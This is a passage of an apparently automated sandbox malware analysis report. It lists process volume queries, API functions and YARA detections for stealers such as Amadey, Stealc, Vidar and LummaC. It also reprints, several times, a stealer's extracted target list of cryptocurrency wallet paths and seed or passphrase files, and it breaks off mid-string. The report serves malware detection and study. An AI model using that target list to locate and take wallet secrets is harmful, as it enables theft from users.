                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C6D21C GetLocalTime,0_2_00C6D21C
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C6D27A GetUserNameW,0_2_00C6D27A
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C4B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00C4B952
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C142DE

                                                Stealing of Sensitive Information

                                                barindex
                                                Yara detected Amadey
                                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                                Yara detected Amadeys Clipper DLL
                                                Source: Yara matchFile source: 21.0.Gxtuum.exe.cb0000.0.unpack, type: UNPACKEDPE
                                                Source: Yara matchFile source: 22.0.Gxtuum.exe.cb0000.0.unpack, type: UNPACKEDPE
                                                Source: Yara matchFile source: 21.2.Gxtuum.exe.cb0000.0.unpack, type: UNPACKEDPE
                                                Source: Yara matchFile source: 20.0.nhDLtPT.exe.bb0000.0.unpack, type: UNPACKEDPE
                                                Source: Yara matchFile source: 20.2.nhDLtPT.exe.bb0000.0.unpack, type: UNPACKEDPE
                                                Source: Yara matchFile source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 00000010.00000003.1782574386.0000000005060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 0000000C.00000003.1399696987.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 0000000C.00000002.1440488176.00000000002B1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 0000000D.00000002.1443417785.00000000002B1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 0000002D.00000003.2150116458.0000000004960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 0000000D.00000003.1402595713.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 00000031.00000003.2208833201.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 0000002D.00000002.2190924706.0000000000161000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 0000000E.00000002.1457033366.0000000000621000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 0000000E.00000003.1414306794.0000000005090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 00000031.00000002.2286174496.0000000000161000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 0000000B.00000003.1369460777.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe, type: DROPPED
                                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe, type: DROPPED
                                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nhDLtPT[1].exe, type: DROPPED
                                                Yara detected GCleaner
                                                Source: Yara matchFile source: 62.2.7dbaa342f5.exe.dd00000.6.raw.unpack, type: UNPACKEDPE
                                                Source: Yara matchFile source: 62.2.7dbaa342f5.exe.da70000.3.raw.unpack, type: UNPACKEDPE
                                                Source: Yara matchFile source: 62.2.7dbaa342f5.exe.da18000.2.raw.unpack, type: UNPACKEDPE
                                                Source: Yara matchFile source: 62.2.7dbaa342f5.exe.da44000.5.raw.unpack, type: UNPACKEDPE
                                                Source: Yara matchFile source: 62.2.7dbaa342f5.exe.da9c000.4.raw.unpack, type: UNPACKEDPE
                                                Source: Yara matchFile source: 0000003E.00000002.2594796685.000000000DA18000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 0000003E.00000002.2584237891.000000000D91C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 0000003E.00000002.2596642815.000000000DD00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 0000003E.00000002.2594796685.000000000DA70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 0000003E.00000002.2594796685.000000000DA9C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 0000003E.00000002.2594796685.000000000DA44000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Yara detected LummaC Stealer
                                                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                                Yara detected PureLog Stealer
                                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10111190101\acd63ce6fe.exe, type: DROPPED
                                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe, type: DROPPED
                                                Yara detected Stealc
                                                Source: Yara matchFile source: 00000019.00000003.2063180045.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 00000017.00000002.2385311293.0000000000F81000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 00000017.00000003.1967536880.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 00000017.00000002.2378435053.000000000075E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: Process Memory Space: ILqcVeT.exe PID: 4156, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: rXOl0pp.exe PID: 8104, type: MEMORYSTR
                                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                                Yara detected SystemBC
                                                Source: Yara matchFile source: 0000001D.00000003.2078657215.0000000004774000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: 00000018.00000003.2018674218.0000000004774000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                                Source: Yara matchFile source: Process Memory Space: vertualiziren.exe PID: 8076, type: MEMORYSTR
                                                Source: Yara matchFile source: Process Memory Space: benskvi.exe PID: 3108, type: MEMORYSTR
                                                Yara detected Vidar stealer
                                                Source: Yara matchFile source: Process Memory Space: ILqcVeT.exe PID: 4156, type: MEMORYSTR
                                                Found many strings related to Crypto-Wallets (likely being stolen)
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia 